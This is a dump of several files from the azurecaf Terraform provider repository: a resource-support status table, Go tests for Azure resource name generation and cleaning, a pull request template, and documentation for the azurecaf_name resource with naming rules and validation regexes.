|azurerm_sql_elasticpool | ✔ |
|azurerm_sql_failover_group | ✔ |
|azurerm_sql_firewall_rule | ✔ |
|azurerm_sql_server | ✔ |
|azurerm_sql_virtual_network_rule | ❌ |
|azurerm_static_site | ✔ |
|azurerm_storage_account | ✔ |
|azurerm_storage_account_blob_container_sas | ❌ |
|azurerm_storage_account_customer_managed_key | ❌ |
|azurerm_storage_account_network_rules | ❌ |
|azurerm_storage_account_sas | ❌ |
|azurerm_storage_blob | ✔ |
|azurerm_storage_container | ✔ |
|azurerm_storage_data_lake_gen2_filesystem | ✔ |
|azurerm_storage_data_lake_gen2_path | ❌ |
|azurerm_storage_encryption_scope | ❌ |
|azurerm_storage_management_policy | ❌ |
|azurerm_storage_queue | ✔ |
|azurerm_storage_share | ✔ |
|azurerm_storage_share_directory | ✔ |
|azurerm_storage_sync | ✔ |
|azurerm_storage_sync_group | ✔ |
|azurerm_storage_table | ✔ |
|azurerm_storage_table_entity | ❌ |
|azurerm_stream_analytics_function_javascript_udf | ✔ |
|azurerm_stream_analytics_job | ✔ |
|azurerm_stream_analytics_output_blob | ✔ |
|azurerm_stream_analytics_output_eventhub | ✔ |
|azurerm_stream_analytics_output_mssql | ✔ |
|azurerm_stream_analytics_output_servicebus_queue | ✔ |
|azurerm_stream_analytics_output_servicebus_topic | ✔ |
|azurerm_stream_analytics_reference_input_blob | ✔ |
|azurerm_stream_analytics_stream_input_blob | ✔ |
|azurerm_stream_analytics_stream_input_eventhub | ✔ |
|azurerm_stream_analytics_stream_input_iothub | ✔ |
|azurerm_subnet | ✔ |
|azurerm_subnet_nat_gateway_association | ❌ |
|azurerm_subnet_network_security_group_association | ❌ |
|azurerm_subnet_route_table_association | ❌ |
|azurerm_subscription | ❌ |
|azurerm_subscription_policy_assignment | ✔ |
|azurerm_subscription_template_deployment | ❌ |
|azurerm_subscriptions | ❌ |
|azurerm_synapse_firewall_rule | ✔ |
|azurerm_synapse_integration_runtime_azure | ✔ |
|azurerm_synapse_integration_runtime_self_hosted | ✔ |
|azurerm_synapse_linked_service | ✔ |
|azurerm_synapse_managed_private_endpoint | ✔ |
|azurerm_synapse_private_link_hub | ✔ |
|azurerm_synapse_role_assignment | ❌ |
|azurerm_synapse_spark_pool | ✔ |
|azurerm_synapse_sql_pool | ✔ |
|azurerm_synapse_sql_pool_vulnerability_assessment_baseline | ✔ |
|azurerm_synapse_sql_pool_workload_classifier | ✔ |
|azurerm_synapse_sql_pool_workload_group | ✔ |
|azurerm_synapse_workspace | ✔ |
|azurerm_template_deployment | ✔ |
|azurerm_traffic_manager_endpoint | ❌ |
|azurerm_traffic_manager_geographical_location | ❌ |
|azurerm_traffic_manager_profile | ✔ |
|azurerm_user_assigned_identity | ✔ |
|azurerm_virtual_desktop_application_group | ✔ |
|azurerm_virtual_desktop_host_pool | ✔ |
|azurerm_virtual_desktop_workspace | ✔ |
|azurerm_virtual_desktop_workspace_application_group_association | ❌ |
|azurerm_virtual_hub | ✔ |
|azurerm_virtual_hub_bgp_connection | ❌ |
|azurerm_virtual_hub_connection | ✔ |
|azurerm_virtual_hub_ip | ❌ |
|azurerm_virtual_hub_route_table | ❌ |
|azurerm_virtual_hub_security_partner_provider | ❌ |
|azurerm_virtual_machine | ✔ |
|azurerm_virtual_machine_data_disk_attachment | ❌ |
|azurerm_virtual_machine_extension | ❌ |
|azurerm_virtual_machine_scale_set | ✔ |
|azurerm_virtual_machine_scale_set_extension | ❌ |
|azurerm_virtual_network | ✔ |
|azurerm_virtual_network_gateway | ✔ |
|azurerm_virtual_network_gateway_connection | ❌ |
|azurerm_virtual_network_peering | ✔ |
|azurerm_virtual_wan | ✔ |
|azurerm_vmware_cluster | ✔ |
|azurerm_vmware_express_route_authorization | ✔ |
|azurerm_vmware_private_cloud | ✔ |
|azurerm_vpn_gateway | ❌ |
|azurerm_vpn_gateway_connection | ✔ |
|azurerm_vpn_server_configuration | ❌ |
|azurerm_vpn_site | ✔ |
|azurerm_web_application_firewall_policy | ✔ |
|azurerm_web_pubsub | ✔ |
|azurerm_web_pubsub_hub | ✔ |
|azurerm_windows_virtual_machine | ✔ |
|azurerm_windows_virtual_machine_scale_set | ✔ |
|azurerm_windows_web_app | ✔ |
|azurerm_windows_web_app_slot | ⚠ |
❌ = Not yet implemented
✔ = Already implemented
⚠ = Will not be implemented
<file_sep>/azurecaf/resource_name_test.go
package azurecaf
import (
"context"
"reflect"
"regexp"
"testing"
"github.com/hashicorp/terraform-plugin-sdk/v2/helper/resource"
"github.com/hashicorp/terraform-plugin-sdk/v2/helper/schema"
)
func setData(prefixes []string, name string, suffixes []string, cleanInput bool) *schema.ResourceData {
data := &schema.ResourceData{}
data.Set("name", name)
data.Set("prefixes", prefixes)
data.Set("suffixes", suffixes)
data.Set("clean_input", cleanInput)
return data
}
func TestCleanInput_no_changes(t *testing.T) {
data := "testdata"
resource := ResourceDefinitions["azurerm_resource_group"]
result := cleanString(data, &resource)
if data != result {
t.Errorf("Expected %s but received %s", data, result)
}
}
func TestCleanInput_remove_always(t *testing.T) {
data := "🐱🚀testdata😊"
expected := "testdata"
resource := ResourceDefinitions["azurerm_resource_group"]
result := cleanString(data, &resource)
if result != expected {
t.Errorf("Expected %s but received %s", expected, result)
}
}
func TestCleanInput_not_remove_special_allowed_chars(t *testing.T) {
data := "testdata()"
expected := "testdata()"
resource := ResourceDefinitions["azurerm_resource_group"]
result := cleanString(data, &resource)
if result != expected {
t.Errorf("Expected %s but received %s", expected, result)
}
}
func TestCleanSplice_no_changes(t *testing.T) {
data := []string{"testdata", "test", "data"}
resource := ResourceDefinitions["azurerm_resource_group"]
result := cleanSlice(data, &resource)
for i := range data {
if data[i] != result[i] {
t.Errorf("Expected %s but received %s", data[i], result[i])
}
}
}
func TestConcatenateParameters_azurerm_public_ip_prefix(t *testing.T) {
prefixes := []string{"pre"}
suffixes := []string{"suf"}
content := []string{"name", "ip"}
separator := "-"
expected := "pre-name-ip-suf"
result := concatenateParameters(separator, prefixes, content, suffixes)
if result != expected {
t.Errorf("Expected %s but received %s", expected, result)
}
}
func TestGetSlug(t *testing.T) {
resourceType := "azurerm_resource_group"
convention := ConventionCafClassic
result := getSlug(resourceType, convention)
expected := "rg"
if result != expected {
t.Errorf("Expected %s but received %s", expected, result)
}
}
func TestGetSlug_unknown(t *testing.T) {
resourceType := "azurerm_does_not_exist"
convention := ConventionCafClassic
result := getSlug(resourceType, convention)
expected := ""
if result != expected {
t.Errorf("Expected %s but received %s", expected, result)
}
}
func TestAccResourceName_CafClassic(t *testing.T) {
resource.UnitTest(t, resource.TestCase{
PreCheck: func() { testAccPreCheck(t) },
Providers: testAccProviders,
CheckDestroy: testAccCheckResourceDestroy,
Steps: []resource.TestStep{
{
Config: testAccResourceNameCafClassicConfig,
Check: resource.ComposeTestCheckFunc(
testAccCafNamingValidation(
"azurecaf_name.classic_rg",
"pr1-pr2-rg-myrg-",
29,
"pr1-pr2"),
regexMatch("azurecaf_name.classic_rg", regexp.MustCompile(ResourceDefinitions["azurerm_resource_group"].ValidationRegExp), 1),
),
},
{
Config: testAccResourceNameCafClassicConfig,
Check: resource.ComposeTestCheckFunc(
testAccCafNamingValidation(
"azurecaf_name.classic_ca_invalid",
"ca-myinvalidcaname",
24,
""),
regexMatch("azurecaf_name.classic_ca_invalid", regexp.MustCompile(ResourceDefinitions["azurerm_container_app"].ValidationRegExp), 1),
),
},
{
Config: testAccResourceNameCafClassicConfig,
Check: resource.ComposeTestCheckFunc(
testAccCafNamingValidation(
"azurecaf_name.passthrough",
"passthrough",
11,
""),
regexMatch("azurecaf_name.passthrough", regexp.MustCompile(ResourceDefinitions["azurerm_container_app"].ValidationRegExp), 1),
),
},
{
Config: testAccResourceNameCafClassicConfig,
Check: resource.ComposeTestCheckFunc(
testAccCafNamingValidation(
"azurecaf_name.classic_cae_invalid",
"cae-myinvalidcaename",
26,
""),
regexMatch("azurecaf_name.classic_cae_invalid", regexp.MustCompile(ResourceDefinitions["azurerm_container_app_environment"].ValidationRegExp), 1),
),
},
{
Config: testAccResourceNameCafClassicConfig,
Check: resource.ComposeTestCheckFunc(
testAccCafNamingValidation(
"azurecaf_name.passthrough",
"passthrough",
11,
""),
regexMatch("azurecaf_name.passthrough", regexp.MustCompile(ResourceDefinitions["azurerm_container_app_environment"].ValidationRegExp), 1),
),
},
{
Config: testAccResourceNameCafClassicConfig,
Check: resource.ComposeTestCheckFunc(
testAccCafNamingValidation(
"azurecaf_name.classic_acr_invalid",
"pr1pr2crmyinvalidacrname",
35,
"pr1pr2"),
regexMatch("azurecaf_name.classic_acr_invalid", regexp.MustCompile(ResourceDefinitions["azurerm_container_registry"].ValidationRegExp), 1),
),
},
{
Config: testAccResourceNameCafClassicConfig,
Check: resource.ComposeTestCheckFunc(
testAccCafNamingValidation(
"azurecaf_name.passthrough",
"passthrough",
11,
""),
regexMatch("azurecaf_name.passthrough", regexp.MustCompile(ResourceDefinitions["azurerm_container_registry"].ValidationRegExp), 1),
),
},
{
Config: testAccResourceNameCafClassicConfig,
Check: resource.ComposeTestCheckFunc(
testAccCafNamingValidation(
"azurecaf_name.apim",
"vsic-apim-apim",
14,
"vsic"),
regexMatch("azurecaf_name.apim", regexp.MustCompile(ResourceDefinitions["azurerm_api_management_service"].ValidationRegExp), 1),
),
},
},
})
}
func TestAccResourceName_CafClassicRSV(t *testing.T) {
resource.UnitTest(t, resource.TestCase{
PreCheck: func() { testAccPreCheck(t) },
Providers: testAccProviders,
CheckDestroy: testAccCheckResourceDestroy,
Steps: []resource.TestStep{
{
Config: testAccResourceNameCafClassicConfigRsv,
Check: resource.ComposeTestCheckFunc(
testAccCafNamingValidation(
"azurecaf_name.rsv",
"pr1-rsv-test-gm-su1",
19,
""),
regexMatch("azurecaf_name.rsv", regexp.MustCompile(ResourceDefinitions["azurerm_recovery_services_vault"].ValidationRegExp), 1),
),
},
},
})
}
func TestComposeName(t *testing.T) {
namePrecedence := []string{"name", "random", "slug", "suffixes", "prefixes"}
prefixes := []string{"a", "b"}
suffixes := []string{"c", "d"}
name := composeName("-", prefixes, "name", "slug", suffixes, "rd", 21, namePrecedence)
expected := "a-b-slug-name-rd-c-d"
if name != expected {
t.Logf("Fail to generate name expected %s received %s", expected, name)
t.Fail()
}
}
func TestComposeNameCutCorrect(t *testing.T) {
namePrecedence := []string{"name", "slug", "random", "suffixes", "prefixes"}
prefixes := []string{"a", "b"}
suffixes := []string{"c", "d"}
name := composeName("-", prefixes, "name", "slug", suffixes, "rd", 19, namePrecedence)
expected := "b-slug-name-rd-c-d"
if name != expected {
t.Logf("Fail to generate name expected %s received %s", expected, name)
t.Fail()
}
}
func TestComposeNameCutMaxLength(t *testing.T) {
namePrecedence := []string{"name", "slug", "random", "suffixes", "prefixes"}
prefixes := []string{}
suffixes := []string{}
name := composeName("-", prefixes, "aaaaaaaaaa", "bla", suffixes, "", 10, namePrecedence)
expected := "aaaaaaaaaa"
if name != expected {
t.Logf("Fail to generate name expected %s received %s", expected, name)
t.Fail()
}
}
func TestComposeNameCutCorrectSuffixes(t *testing.T) {
namePrecedence := []string{"name", "slug", "random", "suffixes", "prefixes"}
prefixes := []string{"a", "b"}
suffixes := []string{"c", "d"}
name := composeName("-", prefixes, "name", "slug", suffixes, "rd", 15, namePrecedence)
expected := "slug-name-rd-c"
if name != expected {
t.Logf("Fail to generate name expected %s received %s", expected, name)
t.Fail()
}
}
func TestComposeEmptyStringArray(t *testing.T) {
namePrecedence := []string{"name", "slug", "random", "suffixes", "prefixes"}
prefixes := []string{"", "b"}
suffixes := []string{"", "d"}
name := composeName("-", prefixes, "", "", suffixes, "", 15, namePrecedence)
expected := "b-d"
if name != expected {
t.Logf("Fail to generate name expected %s received %s", expected, name)
t.Fail()
}
}
func TestValidResourceType_validParameters(t *testing.T) {
resourceType := "azurerm_resource_group"
resourceTypes := []string{"azurerm_container_registry", "azurerm_storage_account"}
isValid, err := validateResourceType(resourceType, resourceTypes)
if !isValid {
t.Logf("resource types considered invalid while input parameters are valid")
t.Fail()
}
if err != nil {
t.Logf("resource validation generated an unexpected error %s", err.Error())
t.Fail()
}
}
func TestValidResourceType_invalidParameters(t *testing.T) {
resourceType := "azurerm_resource_group"
resourceTypes := []string{"azurerm_not_supported", "azurerm_storage_account"}
isValid, err := validateResourceType(resourceType, resourceTypes)
if isValid {
t.Logf("resource types considered valid while input parameters are invalid")
t.Fail()
}
if err == nil {
t.Logf("resource validation did generate an error while the input is invalid")
t.Fail()
}
}
func TestGetResourceNameValid(t *testing.T) {
namePrecedence := []string{"name", "slug", "random", "suffixes", "prefixes"}
resourceName, err := getResourceName("azurerm_resource_group", "-", []string{"a", "b"}, "myrg", nil, "1234", "cafclassic", true, false, true, namePrecedence)
expected := "a-b-rg-myrg-1234"
if err != nil {
t.Logf("getResource Name generated an error %s", err.Error())
t.Fail()
}
if expected != resourceName {
t.Logf("invalid name, expected %s got %s", expected, resourceName)
t.Fail()
}
}
func TestGetResourceNameValidRsv(t *testing.T) {
namePrecedence := []string{"name", "slug", "random", "suffixes", "prefixes"}
resourceName, err := getResourceName("azurerm_recovery_services_vault", "-", []string{"a", "b"}, "test", nil, "1234", "cafclassic", true, false, true, namePrecedence)
expected := "a-b-rsv-test-1234"
if err != nil {
t.Logf("getResource Name generated an error %s", err.Error())
t.Fail()
}
if expected != resourceName {
t.Logf("invalid name, expected %s got %s", expected, resourceName)
t.Fail()
}
}
func TestGetResourceNameValidNoSlug(t *testing.T) {
namePrecedence := []string{"name", "slug", "random", "suffixes", "prefixes"}
resourceName, err := getResourceName("azurerm_resource_group", "-", []string{"a", "b"}, "myrg", nil, "1234", "cafclassic", true, false, false, namePrecedence)
expected := "a-b-myrg-1234"
if err != nil {
t.Logf("getResource Name generated an error %s", err.Error())
t.Fail()
}
if expected != resourceName {
t.Logf("invalid name, expected %s got %s", expected, resourceName)
t.Fail()
}
}
func TestGetResourceNameInvalidResourceType(t *testing.T) {
namePrecedence := []string{"name", "slug", "random", "suffixes", "prefixes"}
resourceName, err := getResourceName("azurerm_invalid", "-", []string{"a", "b"}, "myrg", nil, "1234", "cafclassic", true, false, true, namePrecedence)
expected := "a-b-rg-myrg-1234"
if err == nil {
t.Logf("Expected a validation error, got nil")
t.Fail()
}
if expected == resourceName {
t.Logf("valid name received while an error is expected")
t.Fail()
}
}
func TestGetResourceNamePassthrough(t *testing.T) {
namePrecedence := []string{"name", "slug", "random", "suffixes", "prefixes"}
resourceName, _ := getResourceName("azurerm_resource_group", "-", []string{"a", "b"}, "myrg", nil, "1234", "cafclassic", true, true, true, namePrecedence)
expected := "myrg"
if expected != resourceName {
t.Logf("valid name received while an error is expected")
t.Fail()
}
}
func testResourceNameStateDataV2() map[string]interface{} {
return map[string]interface{}{}
}
func testResourceNameStateDataV3() map[string]interface{} {
return map[string]interface{}{
"use_slug": true,
}
}
func TestResourceExampleInstanceStateUpgradeV2(t *testing.T) {
expected := testResourceNameStateDataV3()
actual, err := resourceNameStateUpgradeV2(context.Background(), testResourceNameStateDataV2(), nil)
if err != nil {
t.Fatalf("error migrating state: %s", err)
}
if !reflect.DeepEqual(expected, actual) {
t.Fatalf("\n\nexpected:\n\n%#v\n\ngot:\n\n%#v\n\n", expected, actual)
}
}
const testAccResourceNameCafClassicConfig = `
# Resource Group
resource "azurecaf_name" "classic_rg" {
name = "myrg"
resource_type = "azurerm_resource_group"
prefixes = ["pr1", "pr2"]
suffixes = ["su1", "su2"]
random_seed = 1
random_length = 5
clean_input = true
}
resource "azurecaf_name" "classic_ca_invalid" {
name = "my_invalid_ca_name"
resource_type = "azurerm_container_app"
random_seed = 1
random_length = 5
clean_input = true
}
resource "azurecaf_name" "classic_cae_invalid" {
name = "my_invalid_cae_name"
resource_type = "azurerm_container_app_environment"
random_seed = 1
random_length = 5
clean_input = true
}
resource "azurecaf_name" "classic_acr_invalid" {
name = "my_invalid_acr_name"
resource_type = "azurerm_container_registry"
prefixes = ["pr1", "pr2"]
suffixes = ["su1", "su2"]
random_seed = 1
random_length = 5
clean_input = true
}
resource "azurecaf_name" "passthrough" {
name = "passthRough"
resource_type = "azurerm_container_registry"
prefixes = ["pr1", "pr2"]
suffixes = ["su1", "su2"]
random_seed = 1
random_length = 5
clean_input = true
passthrough = true
}
resource "azurecaf_name" "apim" {
name = "apim"
resource_type = "azurerm_api_management_service"
prefixes = ["vsic"]
random_length = 0
clean_input = true
passthrough = false
}
`
const testAccResourceNameCafClassicConfigRsv = `
# Resource Group
resource "azurecaf_name" "rsv" {
name = "test"
resource_type = "azurerm_recovery_services_vault"
prefixes = ["pr1"]
suffixes = ["su1"]
random_length = 2
random_seed = 1
clean_input = true
passthrough = false
}
`
<file_sep>/.github/PULL_REQUEST_TEMPLATE.md
# [Issue-id](https://github.com/aztfmod/terraform-provider-azurecaf/issues/ISSUE-ID-GOES-HERE)
## PR Checklist
---
<!-- Use the check list below to ensure your branch is ready for PR. -->
- [ ] I have read the [CONTRIBUTING.MD instructions](./CONTRIBUTING.md)
- [ ] I have changed the `resourceDefinition.json`
- [ ] I have generated the resource model (there's a ```models_generated.go``` file in my PR)
- [ ] I have updated the [README.md#resource-status](../README.md)
- [ ] I have checked to ensure there aren't other open Pull Requests for the same update/change?
## Description
<!-- Concise description of the problem and the solution or the feature being added -->
## Does this introduce a breaking change
- [ ] YES
- [ ] NO
<!-- If this introduces a breaking change, please describe the impact and migration path for existing applications below. -->
## Testing
<!-- Instructions for testing and validation of your code -->
<file_sep>/azurecaf/resource_naming_convention_random_test.go
package azurecaf
import (
"regexp"
"testing"
"github.com/hashicorp/terraform-plugin-sdk/v2/helper/resource"
)
func TestAccCafNamingConventionFull_Random(t *testing.T) {
resource.UnitTest(t, resource.TestCase{
PreCheck: func() { testAccPreCheck(t) },
Providers: testAccProviders,
CheckDestroy: testAccCheckResourceDestroy,
Steps: []resource.TestStep{
{
Config: testAccResourceRandomConfig,
Check: resource.ComposeTestCheckFunc(
testAccCafNamingValidation(
"azurecaf_naming_convention.random_st",
"",
Resources["st"].MaxLength,
"utest"),
regexMatch("azurecaf_naming_convention.random_st", regexp.MustCompile(Resources["st"].ValidationRegExp), 1),
testAccCafNamingValidation(
"azurecaf_naming_convention.random_agw",
"",
Resources["agw"].MaxLength,
"utest"),
regexMatch("azurecaf_naming_convention.random_agw", regexp.MustCompile(Resources["agw"].ValidationRegExp), 1),
testAccCafNamingValidation(
"azurecaf_naming_convention.random_apim",
"",
Resources["apim"].MaxLength,
"utest"),
regexMatch("azurecaf_naming_convention.random_apim", regexp.MustCompile(Resources["apim"].ValidationRegExp), 1),
testAccCafNamingValidation(
"azurecaf_naming_convention.random_app",
"",
Resources["app"].MaxLength,
"utest"),
regexMatch("azurecaf_naming_convention.random_app", regexp.MustCompile(Resources["app"].ValidationRegExp), 1),
testAccCafNamingValidation(
"azurecaf_naming_convention.random_appi",
"",
Resources["appi"].MaxLength,
"utest"),
regexMatch("azurecaf_naming_convention.random_appi", regexp.MustCompile(Resources["appi"].ValidationRegExp), 1),
testAccCafNamingValidation(
"azurecaf_naming_convention.random_aks",
"",
Resources["aks"].MaxLength,
"utest"),
regexMatch("azurecaf_naming_convention.random_aks", regexp.MustCompile(Resources["aks"].ValidationRegExp), 1),
testAccCafNamingValidation(
"azurecaf_naming_convention.random_aksdns",
"",
Resources["aksdns"].MaxLength,
"utest"),
regexMatch("azurecaf_naming_convention.random_aksdns", regexp.MustCompile(Resources["aksdns"].ValidationRegExp), 1),
testAccCafNamingValidation(
"azurecaf_naming_convention.random_aksnpl",
"",
Resources["aksnpl"].MaxLength,
"pr"),
regexMatch("azurecaf_naming_convention.random_aksnpl", regexp.MustCompile(Resources["aksnpl"].ValidationRegExp), 1),
testAccCafNamingValidation(
"azurecaf_naming_convention.random_aksnpw",
"",
Resources["aksnpw"].MaxLength,
"pr"),
regexMatch("azurecaf_naming_convention.random_aksnpl", regexp.MustCompile(Resources["aksnpl"].ValidationRegExp), 1),
testAccCafNamingValidation(
"azurecaf_naming_convention.random_aksnpw",
"",
Resources["aksnpw"].MaxLength,
"pr"),
regexMatch("azurecaf_naming_convention.random_aksnpw", regexp.MustCompile(Resources["aksnpw"].ValidationRegExp), 1),
testAccCafNamingValidation(
"azurecaf_naming_convention.random_ase",
"",
Resources["ase"].MaxLength,
"utest"),
regexMatch("azurecaf_naming_convention.random_ase", regexp.MustCompile(Resources["ase"].ValidationRegExp), 1),
testAccCafNamingValidation(
"azurecaf_naming_convention.random_plan",
"",
Resources["plan"].MaxLength,
"utest"),
regexMatch("azurecaf_naming_convention.random_plan", regexp.MustCompile(Resources["plan"].ValidationRegExp), 1),
testAccCafNamingValidation(
"azurecaf_naming_convention.random_sql",
"",
Resources["sql"].MaxLength,
"utest"),
regexMatch("azurecaf_naming_convention.random_sql", regexp.MustCompile(Resources["sql"].ValidationRegExp), 1),
testAccCafNamingValidation(
"azurecaf_naming_convention.random_sqldb",
"",
Resources["sqldb"].MaxLength,
"utest"),
regexMatch("azurecaf_naming_convention.random_sqldb", regexp.MustCompile(Resources["sqldb"].ValidationRegExp), 1),
),
},
},
})
}
const testAccResourceRandomConfig = `
#Storage account test
resource "azurecaf_naming_convention" "random_st" {
name = "catest"
prefix = "utest"
resource_type = "st"
convention = "random"
}
# Application Gateway
resource "azurecaf_naming_convention" "random_agw" {
convention = "random"
name = "TEST-DEV-AGW-RG"
prefix = "utest"
resource_type = "azurerm_application_gateway"
}
# API Management
resource "azurecaf_naming_convention" "random_apim" {
convention = "random"
name = "TEST-DEV-APIM-RG"
prefix = "utest"
resource_type = "azurerm_api_management"
}
# App Service
resource "azurecaf_naming_convention" "random_app" {
convention = "random"
name = "TEST-DEV-APP-RG"
prefix = "utest"
resource_type = "azurerm_app_service"
}
# Application Insights
resource "azurecaf_naming_convention" "random_appi" {
convention = "random"
name = "TEST-DEV-APPI-RG"
prefix = "utest"
resource_type = "azurerm_application_insights"
}
# Azure Kubernetes Service
resource "azurecaf_naming_convention" "random_aks" {
convention = "random"
name = "TEST-DEV-AKS-RG"
prefix = "utest"
resource_type = "azurerm_kubernetes_cluster"
}
# AKS DNS prefix
resource "azurecaf_naming_convention" "random_aksdns" {
convention = "random"
name = "myaksdnsdemo"
prefix = "utest"
resource_type = "aks_dns_prefix"
}
# AKS Node Pool Linux
resource "azurecaf_naming_convention" "random_aksnpl" {
convention = "random"
name = "np1"
prefix = "pr"
resource_type = "aksnpl"
}
# AKS Node Pool Windows
resource "azurecaf_naming_convention" "random_aksnpw" {
convention = "random"
name = "np2"
prefix = "pr"
resource_type = "aksnpw"
}
# App Service Environment
resource "azurecaf_naming_convention" "random_ase" {
convention = "random"
name = "TEST-DEV-ASE-RG"
prefix = "utest"
resource_type = "azurerm_app_service_environment"
}
# App Service Plan
resource "azurecaf_naming_convention" "random_plan" {
convention = "random"
name = "TEST-DEV-PLAN-RG"
prefix = "utest"
resource_type = "azurerm_app_service_plan"
}
# Azure SQL DB Server
resource "azurecaf_naming_convention" "random_sql" {
convention = "random"
name = "TEST-DEV-SQL-RG"
prefix = "utest"
resource_type = "azurerm_sql_server"
}
# Azure SQL DB
resource "azurecaf_naming_convention" "random_sqldb" {
convention = "random"
name = "TEST-DEV-SQLDB-RG"
prefix = "utest"
resource_type = "azurerm_sql_database"
}
`
<file_sep>/docs/resources/azurecaf_name.md
# azurecaf_name
The resource azurecaf_name implements a set of methodologies to apply consistent resource naming using the default Microsoft Cloud Adoption Framework for Azure recommendations as per [naming-and-tagging](https://docs.microsoft.com/en-us/azure/cloud-adoption-framework/ready/azure-best-practices/naming-and-tagging).
the azurecaf_name supersedes the previous azurecaf_naming_convention. This new resource provides more flexibility and will be updated on a regular basis as new Azure services are released.
The azurecaf_name resource allows you to:
* Clean inputs to make sure they remain compliant with the allowed patterns for each Azure resource
* Generate random characters to append at the end of the resource name
* Handle prefix, suffixes (either manual or as per the Azure cloud adoption framework resource conventions)
* Allow passthrough mode (simply validate the output)
## Example usage
This example outputs one name, the result of the naming convention query. The result attribute returns the name based on the convention and parameters input.
The example generates a 23 characters name compatible with the specification for an Azure Resource Group
dev-aztfmod-001
```hcl
resource "azurecaf_name" "rg_example" {
name = "demogroup"
resource_type = "azurerm_resource_group"
prefixes = ["a", "b"]
suffixes = ["y", "z"]
random_length = 5
clean_input = true
}
resource "azurerm_resource_group" "demo" {
name = azurecaf_name.rg_example.result
location = "southeastasia"
}
```
The provider generates a name using the input parameters and automatically appends a prefix (if defined), a caf prefix (resource type) and postfix (if defined) in addition to a generated padding string based on the selected naming convention.
The example above would generate a name using the pattern [prefix]-[cafprefix]-[name]-[postfix]-[5_random_chars]:
## Argument Reference
The following arguments are supported:
* **name** - (optional) the basename of the resource to create, the basename will be sanitized as per supported characters set for each Azure resources.
* **prefixes** (optional) - a list of prefix to append as the first characters of the generated name - prefixes will be separated by the separator character
* **suffixes** (optional) - a list of additional suffix added after the basename, this is can be used to append resource index (eg. vm-001). Suffixes are separated by the separator character
* **random_length** (optional) - default to ``0`` : configure additional characters to append to the generated resource name. Random characters will remain compliant with the set of allowed characters per resources and will be appended before suffix(ess).
* **random_seed** (optional) - default to ``0`` : Define the seed to be used for random generator. 0 will not be respected and will generate a seed based in the unix time of the generation.
* **resource_type** (optional) - describes the type of azure resource you are requesting a name from (eg. azure container registry: azurerm_container_registry). See the Resource Type section
* **resource_types** (optional) - a list of additional resource type should you want to use the same settings for a set of resources
* **separator** (optional) - defaults to ``-``. The separator character to use between prefixes, resource type, name, suffixes, random character
* **clean_input** (optional) - defaults to ``true``. remove any noncompliant character from the name, suffix or prefix.
* **passthrough** (optional) - defaults to ``false``. Enables the passthrough mode - in that case only the clean input option is considered and the prefixes, suffixes, random, and are ignored. The resource prefixe is not added either to the resulting string
* **use_slug** (optional) - defaults to ``true``. If a slug should be added to the name - If you put false no slug (the few letters that identify the resource type) will be added to the name.
## Attributes Reference
The following attributes are exported:
* **id** - The id of the naming convention object
* **result** - The generated named for an Azure Resource based on the input parameter and the selected naming convention
* **results** - The generated name for the Azure resources based in the resource_types list
## Resource types
We define resource types as per [naming-and-tagging](https://docs.microsoft.com/en-us/azure/cloud-adoption-framework/ready/azure-best-practices/naming-and-tagging)
Current supported resource types:
| Resource type | Resource type code (short) | minimum length | maximum length | lowercase only | validation regex |
| ------------------------| ----------------------------|-----------------|-----------------|----------------|-------------------------------------------|
| azurerm_analysis_services_server| as| 3| 63| true| "^[a-z][a-z0-9]{2,62}$"|
| azurerm_api_management_service| apim| 1| 50| false| "^[a-z][a-zA-Z0-9-][a-zA-Z0-9]{0,48}$"|
| azurerm_app_configuration| appcg| 5| 50| false| "^[a-zA-Z0-9_-]{5,50}$"|
| azurerm_role_assignment| ra| 1| 64| false| "^[^%]{0,63}[^ %.]$"|
| azurerm_role_definition| rd| 1| 64| false| "^[^%]{0,63}[^ %.]$"|
| azurerm_automation_account| aa| 6| 50| false| "^[a-zA-Z][a-zA-Z0-9-]{4,48}[a-zA-Z0-9]$"|
| azurerm_automation_certificate| aacert| 1| 128| false| "^[^<>*%:.?\\+\\/]{0,127}[^<>*%:.?\\+\\/ ]$"|
| azurerm_automation_credential| aacred| 1| 128| false| "^[^<>*%:.?\\+\\/]{0,127}[^<>*%:.?\\+\\/ ]$"|
| azurerm_automation_job_schedule| aajs| 1| 128| false| "^[^<>*%:.?\\+\\/]{0,127}[^<>*%:.?\\+\\/ ]$"|
| azurerm_automation_runbook| aarun| 1| 63| false| "^[a-zA-Z][a-zA-Z0-9-]{0,62}$"|
| azurerm_automation_schedule| aasched| 1| 128| false| "^[^<>*%:.?\\+\\/]{0,127}[^<>*%:.?\\+\\/ ]$"|
| azurerm_automation_variable| aavar| 1| 128| false| "^[^<>*%:.?\\+\\/]{0,127}[^<>*%:.?\\+\\/ ]$"|
| azurerm_batch_account| ba| 3| 24| true| "^[a-z0-9]{3,24}$"|
| azurerm_batch_application| baapp| 1| 64| false| "^[a-zA-Z0-9_-]{1,64}$"|
| azurerm_batch_certificate| bacert| 5| 45| false| "^[a-zA-Z0-9_-]{5,45}$"|
| azurerm_batch_pool| bapool| 3| 24| false| "^[a-zA-Z0-9_-]{1,24}$"|
| azurerm_bot_web_app| bot| 2| 64| false| "^[a-zA-Z0-9][a-zA-Z0-9-_.]{1,63}$"|
| azurerm_bot_channel_Email| botmail| 2| 64| false| "^[a-zA-Z0-9][a-zA-Z0-9-_.]{1,63}$"|
| azurerm_bot_channel_ms_teams| botteams| 2| 64| false| "^[a-zA-Z0-9][a-zA-Z0-9-_.]{1,63}$"|
| azurerm_bot_channel_slack| botslack| 2| 64| false| "^[a-zA-Z0-9][a-zA-Z0-9-_.]{1,63}$"|
| azurerm_bot_channel_directline| botline| 2| 64| false| "^[a-zA-Z0-9][a-zA-Z0-9-_.]{1,63}$"|
| azurerm_bot_channels_registration| botchan| 2| 64| false| "^[a-zA-Z0-9][a-zA-Z0-9-_.]{1,63}$"|
| azurerm_bot_connection| botcon| 2| 64| false| "^[a-zA-Z0-9][a-zA-Z0-9-_.]{1,63}$"|
| azurerm_redis_cache| redis| 1| 63| false| "^[a-zA-Z0-9][a-zA-Z0-9-]{0,61}[a-zA-Z0-9]$"|
| azurerm_redis_firewall_rule| redisfw| 1| 256| false| "^[a-zA-Z0-9]{1,256}$"|
| azurerm_cdn_profile| cdnprof| 1| 260| false| "^[a-zA-Z0-9][a-zA-Z0-9-]{0,258}[a-zA-Z0-9]$"|
| azurerm_cdn_endpoint| cdn| 1| 50| false| "^[a-zA-Z0-9][a-zA-Z0-9-]{0,48}[a-zA-Z0-9]$"|
| azurerm_cognitive_account| cog| 2| 64| false| "^[a-zA-Z0-9][a-zA-Z0-9-]{0,63}$"|
